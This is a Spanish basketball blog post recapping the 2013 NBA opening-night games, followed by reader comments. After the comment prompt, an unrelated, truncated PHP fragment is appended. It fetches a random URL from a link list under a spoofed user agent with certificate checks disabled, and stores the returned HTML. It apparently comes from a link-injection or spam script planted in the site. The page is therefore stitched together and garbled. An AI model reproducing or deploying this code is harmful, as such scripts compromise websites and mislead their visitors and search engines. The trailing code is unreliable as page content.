La Crónica: Opening Night

30 de October de 2013 por TheDeerHunter

Se abre el telón“, como decíamos ayer, y para comenzar los Magic le plantan cara de verdad a un gallo como Indiana Pacers (87-97). A alguno de los nuestros les extrañó que Oladipo partiera de suplente pero quitando a Maxiell que estuvo negado, el resto de piezas de Orlando cumplió notablemente. Necesitó Indiana de una impresionante actuación de Paul George, de Roy Hibbert y, especialmente, de Lance Stephenson para doblegar a unos rebotados Magic. 18 tapones de los Pacers… Impresionante.

En el partido estrella de la noche, palizón de los Heat a los aspirantes Bulls, a pesar del resultado final (95-107). Derrick Rose estuvo muy flojo en su retorno y tuvieron que ser Carlos Boozer y Jimmy Butler los que tiraron del carro de Chicago. Sin embargo, los campeones mostraron su condición con hasta siete hombres en dobles figuras, lo nunca visto. A este nivel colectivo los campeones son intratables. Michael Beasley y Greg Oden no disputaron ni un minuto.

Por último, los Lakers sorprendieron a los Clippers en una extraordinaria segunda parte, particularmente brillante por parte de la segunda unidad (103-116). Buen partido de Pau como titular pero escandaloso de Chris Kaman, Jordan Hill, Jordan Farmar, Jodie Meeks y Xavier Henry. Por momentos, no pareció que Doc Rivers ocupara uno de los banquillos. Vimos una excepcional versión de los Lakers que quiere D’Antoni y es la primera vez desde hace un par de temporadas que el equipo rico logra vencer al pobre. 

PREMIOS

MVP:  Paul George ha vuelto al mismo nivel con el que acabó la temporada pasada. Gracias a sus 24 puntos, 6 rebotes, 5 asistencias y 3 tapones, los Pacers se impusieron a unos Magic que causaron más problemas de los previstos.

Rookie: Ovación para Victor Oladipo en Indiana gracias a su pasado “Hoosier” y correcta respuesta del rookie. Acabó el partido con 12 puntos, 3 rebotes y 2 asistencias en 23 minutos. Mejores cosas están por venir.

Sorpresa: La victoria de los Lakers sobre los Clippers ya puede catalogarse como sorpresa pero la actuación de la segunda unidad no la habría predicho ningún adivino. 12 puntos, 8 rebotes de Jordan Hill; 16 puntos, 6 asistencias de Jordan Farmar, y sobre todo, 22 puntos y 6 rebotes de Xavier Henry. Tampoco nos queremos olvidar del buen partido de Andrew Nicholson, autor de 20 puntos.

Decepción: Esperábamos muchos de Derrick Rose en su vuelta oficial a las canchas pero el base nos dejó muy fríos. 12 puntos (4 de 15) y 5 pérdidas. Empezar contra los campeones tampoco ayuda a coger el ritmo.

Esfuerzo en vano: En ausencia de Rose, fue Carlos Boozer el que cogió el mando. Con 31 puntos y 7 rebotes plantó la cara que pudo a Lebron y compañía.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

18 comentarios a esta entrada

  1. Jose Luis dice:
    #1

    Un paquete Boozer… ¿no?

      Citar

  2. Jose Luis dice:
    #2

    A Farmar no se le ha olvidado jugar, no 😀

      Citar

  3. Laker1624 dice:
    #3

    Buenas,

    Pacers y Heat debutan con muy buena nota y dejándome la sensación que aun les queda mucho basket por enseñar, sobretodo en el caso de Indiana. Supuestamente la mejoría de los Pacers respecto a la campaña pasada esta en el banquillo, que en mi opinión ha estado flojo esta noche, cosa que me hace pensar que a la que los chicos del banco empiecen a rendir, este equipo será aun mas duro.

    Por parte de Miami hemos visto que todos están preparados para revalidar titulo, aunque no creo que veamos rendir a toda la plantilla a la vez al mismo nivel que esta noche, pero bueno, seguramente Lebron ya se encargara de compensar eso a la que se ponga en plan MVP. Ahora hay que ver que tal se encuentra Wade, como siempre…

    En cuanto a los Lakers… parece que d’Antoni ya ha encontrado a su quinteto de oro, solo que prefiere ponerlos al final del partido. Ahora que ya no tiene a un Howard que le condicione con sus cuestiones “políticas” parece que tiene los hue… para poner a jugar a quien crea conveniente. Aun así creo que habrá que esperar a ver como hace funcionar a los teóricos titulares, porque me da que el banquillo laker no va a ofrecer este rendimiento cada día. Supongo que más de uno se ha llevado una decepción con los Clippers, que pese a la llegada de Rivers no me convencen. Si estos chicos jugaran en el Este les daría segunda ronda de PO como mucho, pero como veo al Oeste más flojo que los últimos años quien sabe. Lo que veo claro es que este año el campeón sale del Este. A ver si el amigo Durant, los “viejos” de los Spurs, los espectaculares Clippers y Warriors , los discretos Grizzlies o algún otro hacen que me equivoque…

      Citar

  4. rumbero dice:
    #4

    Laker1624:
    Buenas,

    Pacers y Heat debutan con muy buena nota y dejándome la sensación que aun les queda mucho basket por enseñar, sobretodo en el caso de Indiana. Supuestamente la mejoría de los Pacers respecto a la campaña pasada esta en el banquillo, que en mi opinión ha estado flojo esta noche, cosa que me hace pensar que a la que los chicos del banco empiecen a rendir, este equipo será aun mas duro.

    Flojete el banquillo si. Pero vaya, estos Pacers van a seguir siendo fuertes desde su quinteto. Faltaba Granger, pero ya puede volver fino fino porque con George y Stephenson a este nivel pocos minutos van a regalar. Ahora, me quedo con el estado de forma y físico de Hibbert. 16 puntos y 7 gorros como si nada. Insultante en la pintura. Y bien por Orlando que peleó hasta que pudo: sin Harris, con un Oladipo que no se arrugó en un bautizo NBA de los chungos y unos incomprensiblemente cortos 19 minutos de Nicholson cuando estaba on fire. Seguramente Vaughn quería darle minutos al joven Maxiell.

    Los Heat por su parte estaban con unas ganas locas de enseñar quien manda en el Este y más siendo su noche. Y eso que Rose prometía con un par de penetraciones de las suyas al empezar el partido…pero nada. Las 3 faltas de Butler y Deng en la primera parte los mataron. Sin stoppers en el perímetro, con James haciendo y deshaciendo, Battier y Allen enchufñandolas y una defensa que por momentos parecía la de un séptimo partido de PO. Rose da fe.

    Del duelo angelino ya no he visto nada, pero..¿¡¡76 puntos de los suplentes!!? Habrá que mirarse ese último cuarto por lo menos…

      Citar

  5. GreenPride dice:
    #5

    Bueno pues empezó lo bueno.
    Parece que los Pacers van dispuestos a ser equipo referente. Veremos contra rivales de más entidad.
    Por su parte en el partido estrella Rose se encontró con la realidad de los campeones y estos les pasaron por encima a sus Bulls. Con Deng, Noah y él mismo a tan pobre nivel es imposible que tengan ninguna opción contra unos Heat que se pasearon la mayoría del partido permitiéndose un día de descanso para LeBron.
    Por su parte en LA amazing happens. Los Lakers doblegaron a sus vecinos con 0 minutos de los titulares en el último cuarto y gente como Meeks, Henry o Jordan Hill absolutamente desatados contra los titulares de los Clippers. Mucho trabajo para Doc Rivers, que tiene que conseguir que su equipo no sea una verbena atrás. Queda mucho pero de momento dieron muy malas sensaciones…
    Lo divertido a empezado, que no pare, esta noche Nets-Cavs, Lakers-Warriors y Grizzlies-Spurs como platos fuertes, a pasarselo bien!!

      Citar

  6. Esteban dice:
    #6

    lo dije antes y lo repito ahora, no me gustan los clippers

    y me gustan los lakers, con jhonson, farmar, henry y young y tienen la juventud que d´antoni quiere para hacer su juego rapido y fuerte

      Citar

  7. Ruxixón dice:
    #7

    rumbero:
    Los Heat por su parte estaban con unas ganas locas de enseñar quien manda en el Este y más siendo su noche. Y eso que Rose prometía con un par de penetraciones de las suyas al empezar el partido…pero nada. Las 3 faltas de Butler y Deng en la primera parte los mataron. Sin stoppers en el perímetro, con James haciendo y deshaciendo, Battier y Allen enchufñandolas y una defensa que por momentos parecía la de un séptimo partido de PO. Rose da fe.

    Ahí le has dado,el hecho de que se hable de los Bulls como el equipo que va a derrotar a Miami hizo que a pesar de la caraja inicial típica de los equipos anfitriones que celebran algo,apretaran al máximo,dando una imagen de equipo a nivel PO.Han querido marcar el terreno.

    En cuanto a los Bulls se notó muchísimo la inactividad de Noah,falto de punch después de estar out en pretemporada, y las ganas de jugar de Rose,muy precipitado pero con esas jugadas marca de la casa.Con los minutos irán entrando en calor seguro.Tema aparte es Deng y lo que aporta al equipo,un “antiLeBron” que hoy no rindió pero que es muy importante para la defensa de Chicago(vaya 3:Rose,Butler y Deng).Vamos a ver como juegan con el tema de su renovación

      Citar

  8. Denise dice:
    #8

    Acabo de ver los resumenes, muy bien Orlando. Aguantar 36 minutos en la cancha de los Pacers sin Glen Davis ni Tobias Harris no es moco de pavo. Al final Turkoglu ha entrado en el roster (al menos hasta enero) y han waiveado a Osby en beneficio de Salomon Jones. Me gustó mucho mas Osby que Jones durante la pretemporada, en fin.

    Vaya partido que se ha cascado el amigo Boozer, no? 31 puntos con 13 de 18 tiros. Nada mal para un “hacenumeros”. A pesar de la victoria, los Heat no me generan este año buenas sensaciones, ahora dare mas detalles en su analisis.

    41 puntos en un ultimo cuarto de Lakers sin Kobe? Con Nash metiendo 3 miseros puntos y Gasol jugando medio partido? WTF?? No sé, creo que es un espejismo, Henry, Farmar ó Meeks no creo que den este nivel cada dia. No sería tan duro con los Clippers, tenian enfrente un equipo con unos tios tocados por la varita magica y esto no ha hecho mas que comenzar. Iran mejorando con el paso del tiempo en la defensa.
    No he visto el partido, y mi opinion puede ser desgada pero no me gusta el reparto de minutos que veo en el boxscore. Collison debe jugar mas con Paul y no ser solo el mero recambio de este. Y Redick es un buen jugador pero no puede irse a 33 minutos en un equipo que aspire al anillo. En un contender, con 20-25 tiene bastante.
    Y por supuesto, si quieren el anillo, el amigo Griffin debe ponerse las pilas, es indecente firmar un 3/10 desde la linea de libres.

      Citar

  9. Chipi dice:
    #9

    Impresionante el banquillo Laker, pero a mí me gustaría destacar una cosa que ha pasado casi desapercibida. Primer partido del año con un equipo lleno de dudas, una temporada llena de incógnitas, con Kobe lesionado y Nash al 25% y el amigo Gasol se marca 11 puntos y 6 rebotes en los primeros 8 minutos de partido. Me parece un mensaje a lo William Wallace para el equipo: “Chavales, nadie da un duro por nosotros, vamos a por ellos”.

      Citar

  10. Rompe dice:
    #10

    Por fin empieza la NBA, las crónicas y los premios tjnba… ¡Empiezo a contabilizar desde ya! Muchas gracias por vuestro trabajo y a disfrutar de la temporada!

      Citar

  11. Esteban dice:
    #11

    Por momentos, no pareció que Doc Rivers ocupara uno de los banquillos

    fui terriblemente criticado por mi analisis de los clippers, veremos como se dan los acontecimientos, pero le costara y mucho a rivers armar un buen equipo defensivo con griffin, jordan y un CP3 que por mas buenas manos que tenga, no le sobra intensidad ni mucho menos en defensa

    en cuanto a dudley, ayer defraudo y ya di mi opinion en el analisis, dudo que de la talla, lo mismo, aunque en menor medida le cabe a reddick

    en cuanto al super banco que todos le ven a los clippers, los de siempre solo respondieron, jamal y barnes, LAS GRANDES FIGURAS PARA ESTE BLOG COMO MULLENS Y JAMISON no entraron a la cancha

    y que me perdonen, pero griffin, sin dudas, fue griffin

      Citar

  12. Ruxixón dice:
    #12

    He estado viendo el parte de bajas y que agradable sorpresa ver que la enfermería de los Wolves está vacía,todo un hito por alli.Tengo muchas ganas de ver tanto a Orlando,aún sin Harris,una pena,como a Minesotta,a ver si los enlaces lo permiten xD.Por cierto,leo que Hibbert es duda por problemas en la rodilla,alguien sabe si tuvo algún problema en el partido???

      Citar

  13. Viva_Dirk dice:
    #13

    Jose Luis:
    Un paquete Boozer… ¿no?

    Igual si buscamos partidazos de Boozer vemos muchas derrotas de sus equipos.

      Citar

  14. Simon dice:
    #14

    Ruxixón:
    Por cierto,leo que Hibbert es duda por problemas en la rodilla,alguien sabe si tuvo algún problema en el partido???

    http://www.youtube.com/watch?v=cGddBlBAn-I
    No se como quedará la cosa pero la verdad es que no tenía buena pinta, esperemos que se quede en nada.

      Citar

  15. Ruxixón dice:
    #15

    Simon: http://www.youtube.com/watch?v=cGddBlBAn-I
    No se como quedará la cosa pero la verdad es que no tenía buena pinta, esperemos que se quede en nada.

    Oooopa,pinta feo,a ver si sólo fue el susto,sería una lástima que empezarán a aparecer ya las lesiones el primer día

      Citar

  16. Simon dice:
    #16

    Ahora remontarán… pero Philadelphia comienza con un parcial de 15-0 contra Miami!!!!

      Citar

  17. rumbero dice:
    #17

    Simon:
    Ahora remontarán… pero Philadelphia comienza con un parcial de 15-0 contra Miami!!!!

    De momento aguantan…y Bynum ha dado su primera asistencia en Cleveland. Is this real life?

      Citar

  18. diestro dice:
    #18

    madre mia Carten William JUGON!!

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>